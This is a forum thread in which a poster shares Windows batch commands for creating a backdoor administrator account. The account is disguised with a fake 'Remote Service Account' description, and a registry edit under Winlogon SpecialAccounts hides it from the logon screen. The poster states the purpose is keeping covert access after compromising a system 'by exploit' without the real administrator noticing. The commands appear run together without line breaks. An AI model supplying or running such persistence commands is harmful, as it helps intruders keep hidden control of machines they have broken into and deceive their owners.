Jump to content
xisto Community
Sign in to follow this  
RemoteConnection

Creating Hidden User

Recommended Posts

when u have an access to a windows system by CMD , maybe u need to create an admin account with a remote cnnection,here's the way:

@echo offnet user IUSR_WAN /add /expires:nevernet localgroup administrators /add IUSR_REMOTEnet user IUSR_WAN hermannet user IUSR_WAN /comment:"Built-in account for Remote Service"net user IUSR_WAN /fullname:"Remote Service Account"

also another way that the user won't show on login screen!
@echo offnet user illwill password /add && net localgroup administrators illwill /addecho Windows Registry Editor Version 5.00> c:\hide.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.regecho "illwill"=dword:00000000>> c:\hide.regREGEDIT /S c:\hide.REGDEL /Q c:\hide.REGExit

Share this post


Link to post
Share on other sites

Looks like you need to create this in a batch file. Is that right? If so, you MUST explain the full process of saving to what file type. If this is the commands you need to type on the prompt, use the CONSOLE code. Don't forget to refer to the BB Code Help link during your post. Thank you.

Share this post


Link to post
Share on other sites

hmmm that shounds like a admin backdoor to a computer networking system hmm intriguing. but yeah its look lieky our missing something from it though.

Share this post


Link to post
Share on other sites

It's Xisto's posting rules to give full examples. It's also common courtesy to respect all levels of understandings in this forum. Let's not presume that everyone has the same technical background as you are.

Share this post


Link to post
Share on other sites

i think there is no use of this trick....because then you'll need the admin rights to create any account like this...and secondly if you have admin rights then you you dont need this trick :D

Share this post


Link to post
Share on other sites

well mayank , i'll give u an example , u have gained access to a system by exploit and it gave u the admin rights ... but u wanna create another admin account that u don't want to show on logon screen becase of the primary administrator /// ait?

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

×
×
  • Create New...

Important Information

Terms of Use | Privacy Policy | Guidelines | We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.